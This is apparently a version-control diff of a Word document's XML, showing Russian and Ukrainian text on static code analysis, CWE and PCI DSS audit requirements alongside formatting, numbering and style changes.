+        <w:t xml:space="preserve">Данные документы напрямую не описывают ошибки программирования, в отличие от CWE, но содержат перечень методов, которые могут быть преобразованы для использования в статическом анализаторе исходного кода. От того, какие базы используются в анализаторе, напрямую зависит качество проведения анализа, количество ложных срабатываний и пропущенных ошибок. Кроме того, анализ на соответствие требованиям регуляторов позволяет облегчить и упросить процедуру внешнего аудита инфраструктуры и информационной системы в том случае, если требования являются обязательными. К примеру, требования PCI DSS обязательны для веб-приложений и встраиваемого кода, работающего с платежной информацией по банковским картам, при этом проведение внешнего аудита по выполнению PCI DSS </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>осуществляется</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в том числе с анализом применяемых программных продуктов.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -20083,19 +20647,317 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2">
-    <w:nsid w:val="54BF63B5"/>
+    <w:nsid w:val="4B5255B3"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="04190021"/>
+    <w:tmpl w:val="0442CE44"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3">
+    <w:nsid w:val="53912F4C"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="53BE25C4"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4">
+    <w:nsid w:val="54BF63B5"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="31EECCA0"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:ind w:left="360" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
       </w:rPr>
     </w:lvl>
     <w:lvl w:ilvl="1">
@@ -20195,7 +21057,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="599D32D5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -20308,7 +21170,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
+  <w:abstractNum w:abstractNumId="6">
     <w:nsid w:val="64277235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="67102D8E"/>
@@ -20421,7 +21283,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5">
+  <w:abstractNum w:abstractNumId="7">
     <w:nsid w:val="7DDD64F0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04190021"/>
@@ -20538,19 +21400,25 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="5">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="6">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="6">
+  <w:num w:numId="7">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
@@ -20783,6 +21651,45 @@
       <w:szCs w:val="16"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="a6">
+    <w:name w:val="Normal (Web)"/>
+    <w:basedOn w:val="a"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="0028171A"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
+    <w:name w:val="apple-converted-space"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="0028171A"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
+    <w:name w:val="keyword"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="0028171A"/>
+  </w:style>
+  <w:style w:type="character" w:styleId="a7">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A01E89"/>
+    <w:rPr>
+      <w:color w:val="0000FF"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -21012,6 +21919,45 @@
       <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
       <w:sz w:val="16"/>
       <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a6">
+    <w:name w:val="Normal (Web)"/>
+    <w:basedOn w:val="a"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="0028171A"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
+    <w:name w:val="apple-converted-space"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="0028171A"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
+    <w:name w:val="keyword"/>
+    <w:basedOn w:val="a0"/>
+    <w:rsid w:val="0028171A"/>
+  </w:style>
+  <w:style w:type="character" w:styleId="a7">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A01E89"/>
+    <w:rPr>
+      <w:color w:val="0000FF"/>
+      <w:u w:val="single"/>
     </w:rPr>
   </w:style>
 </w:styles>

</xml_diff>

<commit_message>
with owqsp description 1
</commit_message>
<xml_diff>
--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -8346,17 +8346,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> вимог</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> вимог </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8899,17 +8889,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.1</w:t>
+              <w:t>2.1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9186,17 +9166,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.2</w:t>
+              <w:t>2.2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9497,17 +9467,7 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.3</w:t>
+              <w:t>2.3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9744,17 +9704,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.4</w:t>
+              <w:t>2.4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10023,17 +9973,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.5</w:t>
+              <w:t>2.5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10293,17 +10233,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.6</w:t>
+              <w:t>2.6</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10592,17 +10522,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.7</w:t>
+              <w:t>2.7</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10799,17 +10719,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.8</w:t>
+              <w:t>2.8</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11047,17 +10957,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.9</w:t>
+              <w:t>2.9</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11274,17 +11174,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.10</w:t>
+              <w:t>2.10</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13409,17 +13299,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.1</w:t>
+              <w:t>3.1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13638,17 +13518,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.2</w:t>
+              <w:t>3.2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13853,17 +13723,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.3</w:t>
+              <w:t>3.3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14102,17 +13962,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.4</w:t>
+              <w:t>3.4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14411,17 +14261,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.5</w:t>
+              <w:t>3.5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14638,17 +14478,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.6</w:t>
+              <w:t>3.6</w:t>
             </w:r>
           </w:p>
         </w:tc>
